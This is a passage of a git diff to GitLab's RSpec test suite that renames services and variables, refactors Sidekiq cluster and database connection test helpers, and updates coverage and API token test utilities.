let(:user) { create(:user) } + + it_behaves_like 'a system note' do + let(:action) { 'attention_requested' } + end + + context 'when attention requested' do + it_behaves_like 'a note with overridable created_at' + + it 'sets the note text' do + expect(subject.note).to eq "requested attention from @#{user.username}" + end + end + end + + describe '#remove_attention_request' do + subject { service.remove_attention_request(user) } + + let(:user) { create(:user) } + + it_behaves_like 'a system note' do + let(:action) { 'attention_request_removed' } + end + + context 'when attention request is removed' do + it_behaves_like 'a note with overridable created_at' + + it 'sets the note text' do + expect(subject.note).to eq "removed attention request from @#{user.username}" + end + end + end + describe '#change_title' do let(:noteable) { create(:issue, project: project, title: 'Lorem ipsum') } @@ -274,9 +310,9 @@ RSpec.describe ::SystemNotes::IssuablesService do describe '#cross_reference' do let(:service) { described_class.new(noteable: noteable, author: author) } - let(:mentioner) { create(:issue, project: project) } + let(:mentioned_in) { create(:issue, project: project) } - subject { service.cross_reference(mentioner) } + subject { service.cross_reference(mentioned_in) } it_behaves_like 'a system note' do let(:action) { 'cross_reference' } @@ -314,35 +350,35 @@ RSpec.describe ::SystemNotes::IssuablesService do describe 'note_body' do context 'cross-project' do let(:project2) { create(:project, :repository) } - let(:mentioner) { create(:issue, project: project2) } + let(:mentioned_in) { create(:issue, project: project2) } context 'from Commit' do - let(:mentioner) { project2.repository.commit } + let(:mentioned_in) { project2.repository.commit } it 'references the mentioning commit' do - expect(subject.note).to eq "mentioned in commit #{mentioner.to_reference(project)}" + expect(subject.note).to eq "mentioned in commit #{mentioned_in.to_reference(project)}" end end context 'from non-Commit' do it 'references the mentioning object' do - expect(subject.note).to eq "mentioned in issue #{mentioner.to_reference(project)}" + expect(subject.note).to eq "mentioned in issue #{mentioned_in.to_reference(project)}" end end end context 'within the same project' do context 'from Commit' do - let(:mentioner) { project.repository.commit } + let(:mentioned_in) { project.repository.commit } it 'references the mentioning commit' do - expect(subject.note).to eq "mentioned in commit #{mentioner.to_reference}" + expect(subject.note).to eq "mentioned in commit #{mentioned_in.to_reference}" end end context 'from non-Commit' do it 'references the mentioning object' do - expect(subject.note).to eq "mentioned in issue #{mentioner.to_reference}" + expect(subject.note).to eq "mentioned in issue #{mentioned_in.to_reference}" end end end @@ -350,14 +386,14 @@ RSpec.describe ::SystemNotes::IssuablesService do context 'with external issue' do let(:noteable) { ExternalIssue.new('JIRA-123', project) } - let(:mentioner) { project.commit } + let(:mentioned_in) { project.commit } it 'queues a background worker' do expect(Integrations::CreateExternalCrossReferenceWorker).to receive(:perform_async).with( project.id, 'JIRA-123', 'Commit', - mentioner.id, + mentioned_in.id, author.id ) @@ -716,28 +752,28 @@ RSpec.describe ::SystemNotes::IssuablesService do end describe '#cross_reference_disallowed?' do - context 'when mentioner is not a MergeRequest' do + context 'when mentioned_in is not a MergeRequest' do it 'is falsey' do - mentioner = noteable.dup + mentioned_in = noteable.dup - expect(service.cross_reference_disallowed?(mentioner)).to be_falsey + expect(service.cross_reference_disallowed?(mentioned_in)).to be_falsey end end - context 'when mentioner is a MergeRequest' do - let(:mentioner) { create(:merge_request, :simple, source_project: project) } - let(:noteable) { project.commit } + context 'when mentioned_in is a MergeRequest' do + let(:mentioned_in) { create(:merge_request, :simple, source_project: project) } + let(:noteable) { project.commit } it 'is truthy when noteable is in commits' do - expect(mentioner).to receive(:commits).and_return([noteable]) + expect(mentioned_in).to receive(:commits).and_return([noteable]) - expect(service.cross_reference_disallowed?(mentioner)).to be_truthy + expect(service.cross_reference_disallowed?(mentioned_in)).to be_truthy end it 'is falsey when noteable is not in commits' do - expect(mentioner).to receive(:commits).and_return([]) + expect(mentioned_in).to receive(:commits).and_return([]) - expect(service.cross_reference_disallowed?(mentioner)).to be_falsey + expect(service.cross_reference_disallowed?(mentioned_in)).to be_falsey end end diff --git a/spec/services/todos/destroy/private_features_service_spec.rb b/spec/services/todos/destroy/unauthorized_features_service_spec.rb index 6dbd7574b80..5f6c9b0cdf0 100644 --- a/spec/services/todos/destroy/private_features_service_spec.rb +++ b/spec/services/todos/destroy/unauthorized_features_service_spec.rb @@ -2,13 +2,17 @@ require 'spec_helper' -RSpec.describe Todos::Destroy::PrivateFeaturesService do - let(:project) { create(:project, :public) } - let(:user) { create(:user) } - let(:another_user) { create(:user) } - let(:project_member) { create(:user) } - let(:issue) { create(:issue, project: project) } - let(:mr) { create(:merge_request, source_project: project) } +RSpec.describe Todos::Destroy::UnauthorizedFeaturesService do + let_it_be(:project, reload: true) { create(:project, :public, :repository) } + let_it_be(:issue) { create(:issue, project: project) } + let_it_be(:mr) { create(:merge_request, source_project: project) } + let_it_be(:user) { create(:user) } + let_it_be(:another_user) { create(:user) } + let_it_be(:project_member) do + create(:user).tap do |user| + project.add_developer(user) + end + end let!(:todo_mr_non_member) { create(:todo, user: user, target: mr, project: project) } let!(:todo_mr_non_member2) { create(:todo, user: another_user, target: mr, project: project) } @@ -20,10 +24,6 @@ RSpec.describe Todos::Destroy::PrivateFeaturesService do let!(:commit_todo_non_member2) { create(:on_commit_todo, user: another_user, project: project) } let!(:commit_todo_member) { create(:on_commit_todo, user: project_member, project: project) } - before do - project.add_developer(project_member) - end - context 'when user_id is provided' do subject { described_class.new(project.id, user.id).execute } diff --git a/spec/services/users/dismiss_user_callout_service_spec.rb b/spec/services/users/dismiss_callout_service_spec.rb index 6bf9961eb74..6ba9f180444 100644 --- a/spec/services/users/dismiss_user_callout_service_spec.rb +++ b/spec/services/users/dismiss_callout_service_spec.rb @@ -2,12 +2,12 @@ require 'spec_helper' -RSpec.describe Users::DismissUserCalloutService do +RSpec.describe Users::DismissCalloutService do describe '#execute' do let_it_be(:user) { create(:user) } let(:params) { { feature_name: feature_name } } - let(:feature_name) { UserCallout.feature_names.each_key.first } + let(:feature_name) { Users::Callout.feature_names.each_key.first } subject(:execute) do described_class.new( @@ -15,6 +15,6 @@ RSpec.describe Users::DismissUserCalloutService do ).execute end - it_behaves_like 'dismissing user callout', UserCallout + it_behaves_like 'dismissing user callout', Users::Callout end end diff --git a/spec/services/users/refresh_authorized_projects_service_spec.rb b/spec/services/users/refresh_authorized_projects_service_spec.rb index a8ad0d02f60..aa4df93a241 100644 --- a/spec/services/users/refresh_authorized_projects_service_spec.rb +++ b/spec/services/users/refresh_authorized_projects_service_spec.rb @@ -67,11 +67,17 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do it 'updates the authorized projects of the user' do project2 = create(:project) - to_remove = user.project_authorizations + project_authorization = user.project_authorizations .create!(project: project2, access_level: Gitlab::Access::MAINTAINER) + to_be_removed = [project_authorization.project_id] + + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] + expect(service).to receive(:update_authorizations) - .with([to_remove.project_id], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + .with(to_be_removed, to_be_added) service.execute_without_lease end @@ -81,9 +87,14 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do user.project_authorizations.create!(project: project, access_level: access_level) end + to_be_removed = [project.id] + + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] expect(service).to( receive(:update_authorizations) - .with([project.id], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + .with(to_be_removed, to_be_added) .and_call_original) service.execute_without_lease @@ -99,11 +110,17 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do it 'sets the access level of a project to the highest available level' do user.project_authorizations.delete_all - to_remove = user.project_authorizations + project_authorization = user.project_authorizations .create!(project: project, access_level: Gitlab::Access::DEVELOPER) + to_be_removed = [project_authorization.project_id] + + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] + expect(service).to receive(:update_authorizations) - .with([to_remove.project_id], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + .with(to_be_removed, to_be_added) service.execute_without_lease end @@ -134,7 +151,11 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do it 'inserts authorizations that should be added' do user.project_authorizations.delete_all - service.update_authorizations([], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] + + service.update_authorizations([], to_be_added) authorizations = user.project_authorizations @@ -160,7 +181,11 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do 'authorized_projects_refresh.rows_added_slice': [[user.id, project.id, Gitlab::Access::MAINTAINER]]) ) - service.update_authorizations([], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] + + service.update_authorizations([], to_be_added) end end end diff --git a/spec/services/verify_pages_domain_service_spec.rb b/spec/services/verify_pages_domain_service_spec.rb index ae079229891..2a3b3814065 100644 --- a/spec/services/verify_pages_domain_service_spec.rb +++ b/spec/services/verify_pages_domain_service_spec.rb @@ -372,7 +372,8 @@ RSpec.describe VerifyPagesDomainService do allow(resolver).to receive(:getresources) { [] } stubbed_lookups.each do |domain, records| records = Array(records).map { |txt| Resolv::DNS::Resource::IN::TXT.new(txt) } - allow(resolver).to receive(:getresources).with(domain, Resolv::DNS::Resource::IN::TXT) { records } + # Append '.' to domain_name, indicating absolute FQDN + allow(resolver).to receive(:getresources).with(domain + '.', Resolv::DNS::Resource::IN::TXT) { records } end resolver diff --git a/spec/sidekiq_cluster/sidekiq_cluster_spec.rb b/spec/sidekiq_cluster/sidekiq_cluster_spec.rb index 1d2b47e78ce..c0a919a4aec 100644 --- a/spec/sidekiq_cluster/sidekiq_cluster_spec.rb +++ b/spec/sidekiq_cluster/sidekiq_cluster_spec.rb @@ -5,68 +5,30 @@ require 'rspec-parameterized' require_relative '../../sidekiq_cluster/sidekiq_cluster' RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath - describe '.trap_signals' do - it 'traps the given signals' do - expect(described_class).to receive(:trap).ordered.with(:INT) - expect(described_class).to receive(:trap).ordered.with(:HUP) - - described_class.trap_signals(%i(INT HUP)) - end - end - - describe '.trap_terminate' do - it 'traps the termination signals' do - expect(described_class).to receive(:trap_signals) - .with(described_class::TERMINATE_SIGNALS) - - described_class.trap_terminate { } - end - end - - describe '.trap_forward' do - it 'traps the signals to forward' do - expect(described_class).to receive(:trap_signals) - .with(described_class::FORWARD_SIGNALS) - - described_class.trap_forward { } - end - end - - describe '.signal' do - it 'sends a signal to the given process' do - allow(Process).to receive(:kill).with(:INT, 4) - expect(described_class.signal(4, :INT)).to eq(true) - end - - it 'returns false when the process does not exist' do - allow(Process).to receive(:kill).with(:INT, 4).and_raise(Errno::ESRCH) - expect(described_class.signal(4, :INT)).to eq(false) - end - end - - describe '.signal_processes' do - it 'sends a signal to every given process' do - expect(described_class).to receive(:signal).with(1, :INT) - - described_class.signal_processes([1], :INT) - end - end - describe '.start' do it 'starts Sidekiq with the given queues, environment and options' do - expected_options = { - env: :production, - directory: 'foo/bar', - max_concurrency: 20, - min_concurrency: 10, - timeout: 25, - dryrun: true + process_options = { + pgroup: true, + err: $stderr, + out: $stdout } - expect(described_class).to receive(:start_sidekiq).ordered.with(%w(foo), expected_options.merge(worker_id: 0)) - expect(described_class).to receive(:start_sidekiq).ordered.with(%w(bar baz), expected_options.merge(worker_id: 1)) + expect(Bundler).to receive(:with_original_env).and_call_original.twice + + expect(Process).to receive(:spawn).ordered.with({ + "ENABLE_SIDEKIQ_CLUSTER" => "1", + "SIDEKIQ_WORKER_ID" => "0" + }, + "bundle", "exec", "sidekiq", "-c10", "-eproduction", "-t25", "-gqueues:foo", "-rfoo/bar", "-qfoo,1", process_options + ) + expect(Process).to receive(:spawn).ordered.with({ + "ENABLE_SIDEKIQ_CLUSTER" => "1", + "SIDEKIQ_WORKER_ID" => "1" + }, + "bundle", "exec", "sidekiq", "-c10", "-eproduction", "-t25", "-gqueues:bar,baz", "-rfoo/bar", "-qbar,1", "-qbaz,1", process_options + ) - described_class.start([%w(foo), %w(bar baz)], env: :production, directory: 'foo/bar', max_concurrency: 20, min_concurrency: 10, dryrun: true) + described_class.start([%w(foo), %w(bar baz)], env: :production, directory: 'foo/bar', max_concurrency: 20, min_concurrency: 10) end it 'starts Sidekiq with the given queues and sensible default options' do @@ -99,7 +61,7 @@ RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath it 'starts a Sidekiq process' do allow(Process).to receive(:spawn).and_return(1) - expect(described_class).to receive(:wait_async).with(1) + expect(Gitlab::ProcessManagement).to receive(:wait_async).with(1) expect(described_class.start_sidekiq(%w(foo), **options)).to eq(1) end @@ -109,7 +71,7 @@ RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath .with(env, *args, anything) .and_return(1) - expect(described_class).to receive(:wait_async).with(1) + expect(Gitlab::ProcessManagement).to receive(:wait_async).with(1) expect(described_class.start_sidekiq(%w(foo foo bar baz), **options)).to eq(1) end @@ -119,7 +81,7 @@ RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath .with(anything, *args, a_hash_including(pgroup: true)) .and_return(1) - allow(described_class).to receive(:wait_async) + allow(Gitlab::ProcessManagement).to receive(:wait_async) expect(described_class.start_sidekiq(%w(foo bar baz), **options)).to eq(1) end end @@ -152,57 +114,4 @@ RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath it { expect(described_class.concurrency(queues, min, max)).to eq(expected) } end end - - describe '.wait_async' do - it 'waits for a process in a separate thread' do - thread = described_class.wait_async(Process.spawn('true')) - - # Upon success Process.wait just returns the PID. - expect(thread.value).to be_a_kind_of(Numeric) - end - end - - # In the X_alive? checks, we check negative PIDs sometimes as a simple way - # to be sure the pids are definitely for non-existent processes. - # Note that -1 is special, and sends the signal to every process we have permission - # for, so we use -2, -3 etc - describe '.all_alive?' do - it 'returns true if all processes are alive' do - processes = [Process.pid] - - expect(described_class.all_alive?(processes)).to eq(true) - end - - it 'returns false when a thread was not alive' do - processes = [-2] - - expect(described_class.all_alive?(processes)).to eq(false) - end - end - - describe '.any_alive?' do - it 'returns true if at least one process is alive' do - processes = [Process.pid, -2] - - expect(described_class.any_alive?(processes)).to eq(true) - end - - it 'returns false when all threads are dead' do - processes = [-2, -3] - - expect(described_class.any_alive?(processes)).to eq(false) - end - end - - describe '.write_pid' do - it 'writes the PID of the current process to the given file' do - handle = double(:handle) - - allow(File).to receive(:open).with('/dev/null', 'w').and_yield(handle) - - expect(handle).to receive(:write).with(Process.pid.to_s) - - described_class.write_pid('/dev/null') - end - end end diff --git a/spec/simplecov_env.rb b/spec/simplecov_env.rb index 617a45ae449..a5efc8348a4 100644 --- a/spec/simplecov_env.rb +++ b/spec/simplecov_env.rb @@ -2,6 +2,7 @@ require 'simplecov' require 'simplecov-cobertura' +require 'simplecov-lcov' require_relative '../lib/gitlab/utils' module SimpleCovEnv @@ -18,10 +19,13 @@ module SimpleCovEnv end def configure_formatter + SimpleCov::Formatter::LcovFormatter.config.report_with_single_file = true + SimpleCov.formatters = SimpleCov::Formatter::MultiFormatter.new([ SimpleCov::Formatter::SimpleFormatter, SimpleCov::Formatter::HTMLFormatter, - SimpleCov::Formatter::CoberturaFormatter + SimpleCov::Formatter::CoberturaFormatter, + SimpleCov::Formatter::LcovFormatter ]) end @@ -49,11 +53,9 @@ module SimpleCovEnv track_files '{app,config/initializers,config/initializers_before_autoloader,db/post_migrate,haml_lint,lib,rubocop,tooling}/**/*.rb' add_filter '/vendor/ruby/' - add_filter '/app/controllers/sherlock/' + add_filter '/app/controllers/sherlock/' # Profiling tool used only in development add_filter '/bin/' - add_filter 'db/fixtures/' # Matches EE files as well - add_filter '/lib/gitlab/sidekiq_middleware/' - add_filter '/lib/system_check/' + add_filter 'db/fixtures/development/' # Matches EE files as well add_group 'Channels', 'app/channels' # Matches EE files as well add_group 'Controllers', 'app/controllers' # Matches EE files as well diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index 52560f1f1c3..c497f8245fe 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -239,6 +239,7 @@ RSpec.configure do |config| # is not yet opened at the time that is triggered config.prepend_before do ApplicationRecord.set_open_transactions_baseline + ::Ci::ApplicationRecord.set_open_transactions_baseline end config.append_before do @@ -247,6 +248,7 @@ RSpec.configure do |config| config.append_after do ApplicationRecord.reset_open_transactions_baseline + ::Ci::ApplicationRecord.reset_open_transactions_baseline end config.before do |example| @@ -321,10 +323,6 @@ RSpec.configure do |config| # For more information check https://gitlab.com/gitlab-org/gitlab/-/issues/339348 stub_feature_flags(new_header_search: false) - # Disable the override flag in order to enable the feature by default. - # See https://docs.gitlab.com/ee/development/feature_flags/#selectively-disable-by-actor - stub_feature_flags(surface_environment_creation_failure_override: false) - allow(Gitlab::GitalyClient).to receive(:can_use_disk?).and_return(enable_rugged) else unstub_all_feature_flags @@ -454,6 +452,13 @@ RSpec.configure do |config| $stdout = StringIO.new end + # Makes diffs show entire non-truncated values. + config.before(:each, unlimited_max_formatted_output_length: true) do |_example| + config.expect_with :rspec do |c| + c.max_formatted_output_length = nil + end + end + config.after(:each, :silence_stdout) do $stdout = STDOUT end @@ -476,6 +481,10 @@ Rugged::Settings['search_path_global'] = Rails.root.join('tmp/tests').to_s # Initialize FactoryDefault to use create_default helper TestProf::FactoryDefault.init +# Exclude the Geo proxy API request from getting on_next_request Warden handlers, +# necessary to prevent race conditions with feature tests not getting authenticated. +::Warden.asset_paths << %r{^/api/v4/geo/proxy$} + module TouchRackUploadedFile def initialize_from_file_path(path) super diff --git a/spec/support/database/cross-database-modification-allowlist.yml b/spec/support/database/cross-database-modification-allowlist.yml index d05812a64eb..d6e74349069 100644 --- a/spec/support/database/cross-database-modification-allowlist.yml +++ b/spec/support/database/cross-database-modification-allowlist.yml @@ -1,90 +1,31 @@ -- "./ee/spec/controllers/projects/settings/access_tokens_controller_spec.rb" -- "./ee/spec/lib/gitlab/ci/templates/Jobs/dast_default_branch_gitlab_ci_yaml_spec.rb" - "./ee/spec/mailers/notify_spec.rb" -- "./ee/spec/models/ci/bridge_spec.rb" -- "./ee/spec/models/ci/build_spec.rb" -- "./ee/spec/models/ci/minutes/additional_pack_spec.rb" -- "./ee/spec/models/ee/ci/job_artifact_spec.rb" - "./ee/spec/models/group_member_spec.rb" -- "./ee/spec/replicators/geo/pipeline_artifact_replicator_spec.rb" - "./ee/spec/replicators/geo/terraform_state_version_replicator_spec.rb" -- "./ee/spec/services/ci/destroy_pipeline_service_spec.rb" - "./ee/spec/services/ci/retry_build_service_spec.rb" -- "./ee/spec/services/ci/subscribe_bridge_service_spec.rb" -- "./ee/spec/services/deployments/auto_rollback_service_spec.rb" -- "./ee/spec/services/ee/ci/job_artifacts/destroy_all_expired_service_spec.rb" -- "./ee/spec/services/ee/users/destroy_service_spec.rb" -- "./ee/spec/services/projects/transfer_service_spec.rb" -- "./ee/spec/services/security/security_orchestration_policies/rule_schedule_service_spec.rb" - "./spec/controllers/abuse_reports_controller_spec.rb" -- "./spec/controllers/admin/spam_logs_controller_spec.rb" -- "./spec/controllers/admin/users_controller_spec.rb" - "./spec/controllers/omniauth_callbacks_controller_spec.rb" - "./spec/controllers/projects/issues_controller_spec.rb" -- "./spec/controllers/projects/pipelines_controller_spec.rb" -- "./spec/controllers/projects/settings/access_tokens_controller_spec.rb" - "./spec/features/issues/issue_detail_spec.rb" - "./spec/features/projects/pipelines/pipeline_spec.rb" - "./spec/features/signed_commits_spec.rb" - "./spec/helpers/issuables_helper_spec.rb" - "./spec/lib/gitlab/auth_spec.rb" - "./spec/lib/gitlab/ci/pipeline/chain/create_spec.rb" -- "./spec/lib/gitlab/ci/pipeline/chain/seed_block_spec.rb" -- "./spec/lib/gitlab/ci/pipeline/seed/build_spec.rb" -- "./spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb" -- "./spec/lib/gitlab/ci/templates/AWS/deploy_ecs_gitlab_ci_yaml_spec.rb" -- "./spec/lib/gitlab/ci/templates/Jobs/deploy_gitlab_ci_yaml_spec.rb" -- "./spec/lib/gitlab/ci/templates/auto_devops_gitlab_ci_yaml_spec.rb" -- "./spec/lib/gitlab/ci/templates/managed_cluster_applications_gitlab_ci_yaml_spec.rb" - "./spec/lib/gitlab/email/handler/create_issue_handler_spec.rb" - "./spec/lib/gitlab/email/handler/create_merge_request_handler_spec.rb" - "./spec/lib/gitlab/email/handler/create_note_handler_spec.rb" - "./spec/lib/gitlab/email/handler/create_note_on_issuable_handler_spec.rb" -- "./spec/lib/peek/views/active_record_spec.rb" -- "./spec/models/ci/build_need_spec.rb" - "./spec/models/ci/build_trace_chunk_spec.rb" -- "./spec/models/ci/group_variable_spec.rb" - "./spec/models/ci/job_artifact_spec.rb" -- "./spec/models/ci/job_variable_spec.rb" -- "./spec/models/ci/pipeline_spec.rb" - "./spec/models/ci/runner_spec.rb" -- "./spec/models/ci/variable_spec.rb" - "./spec/models/clusters/applications/runner_spec.rb" -- "./spec/models/commit_status_spec.rb" -- "./spec/models/concerns/batch_destroy_dependent_associations_spec.rb" -- "./spec/models/concerns/bulk_insertable_associations_spec.rb" -- "./spec/models/concerns/has_environment_scope_spec.rb" -- "./spec/models/concerns/token_authenticatable_spec.rb" - "./spec/models/design_management/version_spec.rb" - "./spec/models/hooks/system_hook_spec.rb" - "./spec/models/members/project_member_spec.rb" -- "./spec/models/spam_log_spec.rb" - "./spec/models/user_spec.rb" - "./spec/models/user_status_spec.rb" -- "./spec/requests/api/ci/pipeline_schedules_spec.rb" -- "./spec/requests/api/ci/pipelines_spec.rb" -- "./spec/requests/api/commit_statuses_spec.rb" - "./spec/requests/api/commits_spec.rb" -- "./spec/requests/api/graphql/mutations/ci/pipeline_destroy_spec.rb" -- "./spec/requests/api/resource_access_tokens_spec.rb" -- "./spec/requests/api/users_spec.rb" -- "./spec/services/ci/create_pipeline_service/environment_spec.rb" -- "./spec/services/ci/create_pipeline_service_spec.rb" -- "./spec/services/ci/destroy_pipeline_service_spec.rb" -- "./spec/services/ci/ensure_stage_service_spec.rb" -- "./spec/services/ci/expire_pipeline_cache_service_spec.rb" -- "./spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb" -- "./spec/services/ci/job_artifacts/destroy_associations_service_spec.rb" -- "./spec/services/ci/pipeline_bridge_status_service_spec.rb" -- "./spec/services/ci/pipelines/add_job_service_spec.rb" - "./spec/services/ci/retry_build_service_spec.rb" -- "./spec/services/groups/transfer_service_spec.rb" -- "./spec/services/projects/destroy_service_spec.rb" - "./spec/services/projects/overwrite_project_service_spec.rb" -- "./spec/services/projects/transfer_service_spec.rb" -- "./spec/services/resource_access_tokens/revoke_service_spec.rb" -- "./spec/services/users/destroy_service_spec.rb" -- "./spec/services/users/reject_service_spec.rb" - "./spec/workers/merge_requests/create_pipeline_worker_spec.rb" -- "./spec/workers/remove_expired_members_worker_spec.rb" - "./spec/workers/repository_cleanup_worker_spec.rb" diff --git a/spec/support/database/multiple_databases.rb b/spec/support/database/multiple_databases.rb index 9e72ea589e3..94857b47127 100644 --- a/spec/support/database/multiple_databases.rb +++ b/spec/support/database/multiple_databases.rb @@ -6,6 +6,10 @@ module Database skip 'Skipping because multiple databases not set up' unless Gitlab::Database.has_config?(:ci) end + def skip_if_multiple_databases_are_setup + skip 'Skipping because multiple databases are set up' if Gitlab::Database.has_config?(:ci) + end + def reconfigure_db_connection(name: nil, config_hash: {}, model: ActiveRecord::Base, config_model: nil) db_config = (config_model || model).connection_db_config @@ -46,6 +50,26 @@ module Database new_handler&.clear_all_connections! end # rubocop:enable Database/MultipleDatabases + + def with_added_ci_connection + if Gitlab::Database.has_config?(:ci) + # No need to add a ci: connection if we already have one + yield + else + with_reestablished_active_record_base(reconnect: true) do + reconfigure_db_connection( + name: :ci, + model: Ci::ApplicationRecord, + config_model: ActiveRecord::Base + ) + + yield + + # Cleanup connection_specification_name for Ci::ApplicationRecord + Ci::ApplicationRecord.remove_connection + end + end + end end module ActiveRecordBaseEstablishConnection @@ -69,18 +93,9 @@ RSpec.configure do |config| end end - config.around(:each, :mocked_ci_connection) do |example| - with_reestablished_active_record_base(reconnect: true) do - reconfigure_db_connection( - name: :ci, - model: Ci::ApplicationRecord, - config_model: ActiveRecord::Base - ) - + config.around(:each, :add_ci_connection) do |example| + with_added_ci_connection do example.run - - # Cleanup connection_specification_name for Ci::ApplicationRecord - Ci::ApplicationRecord.remove_connection end end end diff --git a/spec/support/database/prevent_cross_joins.rb b/spec/support/database/prevent_cross_joins.rb index e69374fbc70..42c69a26788 100644 --- a/spec/support/database/prevent_cross_joins.rb +++ b/spec/support/database/prevent_cross_joins.rb @@ -31,9 +31,13 @@ module Database # See https://gitlab.com/gitlab-org/gitlab/-/issues/339396 return if sql.include?("DISABLE TRIGGER") || sql.include?("ENABLE TRIGGER") - # PgQuery might fail in some cases due to limited nesting: - # https://github.com/pganalyze/pg_query/issues/209 - tables = PgQuery.parse(sql).tables + tables = begin + PgQuery.parse(sql).tables + rescue PgQuery::ParseError + # PgQuery might fail in some cases due to limited nesting: + # https://github.com/pganalyze/pg_query/issues/209 + return + end schemas = ::Gitlab::Database::GitlabSchema.table_schemas(tables) diff --git a/spec/support/database/query_analyzer.rb b/spec/support/database/query_analyzer.rb index 85fa55f81ef..6d6627d54b9 100644 --- a/spec/support/database/query_analyzer.rb +++ b/spec/support/database/query_analyzer.rb @@ -4,11 +4,15 @@ # can be disabled selectively RSpec.configure do |config| - config.around do |example| + config.before do |example| if example.metadata.fetch(:query_analyzers, true) - ::Gitlab::Database::QueryAnalyzer.instance.within { example.run } - else - example.run + ::Gitlab::Database::QueryAnalyzer.instance.begin! + end + end + + config.after do |example| + if example.metadata.fetch(:query_analyzers, true) + ::Gitlab::Database::QueryAnalyzer.instance.end! end end end diff --git a/spec/support/flaky_tests.rb b/spec/support/flaky_tests.rb index 30a064d8705..0c211af695d 100644 --- a/spec/support/flaky_tests.rb +++ b/spec/support/flaky_tests.rb @@ -11,7 +11,7 @@ RSpec.configure do |config| raise "$SUITE_FLAKY_RSPEC_REPORT_PATH is empty." if ENV['SUITE_FLAKY_RSPEC_REPORT_PATH'].to_s.empty? raise "#{ENV['SUITE_FLAKY_RSPEC_REPORT_PATH']} doesn't exist" unless File.exist?(ENV['SUITE_FLAKY_RSPEC_REPORT_PATH']) - RspecFlaky::Report.load(ENV['SUITE_FLAKY_RSPEC_REPORT_PATH']).map { |_, flaky_test_data| flaky_test_data["example_id"] } + RspecFlaky::Report.load(ENV['SUITE_FLAKY_RSPEC_REPORT_PATH']).map { |_, flaky_test_data| flaky_test_data.to_h[:example_id] } rescue => e # rubocop:disable Style/RescueStandardError puts e [] diff --git a/spec/support/frontend_fixtures.rb b/spec/support/frontend_fixtures.rb new file mode 100644 index 00000000000..5587d9059dd --- /dev/null +++ b/spec/support/frontend_fixtures.rb @@ -0,0 +1,16 @@ +# frozen_string_literal: true + +return unless ENV['CI'] +return unless ENV['GENERATE_FRONTEND_FIXTURES_MAPPING'] == 'true' + +RSpec.configure do |config| + config.before(:suite) do + $fixtures_mapping = Hash.new { |h, k| h[k] = [] } # rubocop:disable Style/GlobalVars + end + + config.after(:suite) do + next unless ENV['FRONTEND_FIXTURES_MAPPING_PATH'] + + File.write(ENV['FRONTEND_FIXTURES_MAPPING_PATH'], $fixtures_mapping.to_json) # rubocop:disable Style/GlobalVars + end +end diff --git a/spec/support/graphql/fake_query_type.rb b/spec/support/graphql/fake_query_type.rb index ffd851a6e6a..18cf2cf3e82 100644 --- a/spec/support/graphql/fake_query_type.rb +++ b/spec/support/graphql/fake_query_type.rb @@ -1,15 +1,22 @@ # frozen_string_literal: true +require 'graphql' module Graphql - class FakeQueryType < Types::BaseObject + class FakeQueryType < ::GraphQL::Schema::Object graphql_name 'FakeQuery' field :hello_world, String, null: true do argument :message, String, required: false end + field :breaking_field, String, null: true + def hello_world(message: "world") "Hello #{message}!" end + + def breaking_field + raise "This field is supposed to break" + end end end diff --git a/spec/support/graphql/field_inspection.rb b/spec/support/graphql/field_inspection.rb index f39ba751141..e5fe37ec555 100644 --- a/spec/support/graphql/field_inspection.rb +++ b/spec/support/graphql/field_inspection.rb @@ -22,7 +22,7 @@ module Graphql @type ||= begin field_type = @field.type.respond_to?(:to_graphql) ? @field.type.to_graphql : @field.type - # The type could be nested. For example `[GraphQL::STRING_TYPE]`: + # The type could be nested. For example `[GraphQL::Types::String]`: # - List # - String! # - String diff --git a/spec/support/helpers/api_helpers.rb b/spec/support/helpers/api_helpers.rb index d3cc7367b6e..fd85071cca3 100644 --- a/spec/support/helpers/api_helpers.rb +++ b/spec/support/helpers/api_helpers.rb @@ -19,13 +19,15 @@ module ApiHelpers # => "/api/v2/issues?foo=bar&private_token=..." # # Returns the relative path to the requested API resource - def api(path, user = nil, version: API::API.version, personal_access_token: nil, oauth_access_token: nil) + def api(path, user = nil, version: API::API.version, personal_access_token: nil, oauth_access_token: nil, job_token: nil) full_path = "/api/#{version}#{path}" if oauth_access_token query_string = "access_token=#{oauth_access_token.token}" elsif personal_access_token query_string = "private_token=#{personal_access_token.token}" + elsif job_token + query_string = "job_token=#{job_token}" elsif user personal_access_token = create(:personal_access_token, user: user) query_string = "private_token=#{personal_access_token.token}" diff --git a/spec/support/helpers/features/invite_members_modal_helper.rb b/spec/support/helpers/features/invite_members_modal_helper.rb index 3502558b2c2..11040562b49 100644 --- a/spec/support/helpers/features/invite_members_modal_helper.rb +++ b/spec/support/helpers/features/invite_members_modal_helper.rb @@ -5,7 +5,7 @@ module Spec module Helpers module Features module InviteMembersModalHelper - def invite_member(name, role: 'Guest', expires_at: nil, area_of_focus: false) + def invite_member(name, role: 'Guest', expires_at: nil) click_on 'Invite members' page.within '[data-testid="invite-members-modal"]' do 